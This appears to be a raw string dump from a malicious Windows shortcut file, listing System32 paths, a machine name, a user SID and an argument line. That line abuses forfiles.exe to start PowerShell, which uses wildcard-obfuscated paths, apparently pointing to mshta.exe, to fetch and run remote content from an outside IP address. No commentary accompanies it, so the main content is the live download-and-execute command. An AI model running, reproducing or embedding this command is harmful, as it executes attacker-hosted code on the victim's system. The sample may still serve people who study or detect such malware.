Windows
System32
forfiles.exe
C:\Windows\System32\forfiles.exe
win-8oa3ccqae4d
ZWindows
System32
%forfiles.exe
&..\..\..\Windows\System32\forfiles.exe_/p C:\Windows\System32 /m calc.exe /c "powershell . \*i*\S*3*\m*ta.e* http://185.196.10.124/oo"
shell32.dll
S-1-5-21-1924579766-1587744986-4199933114-500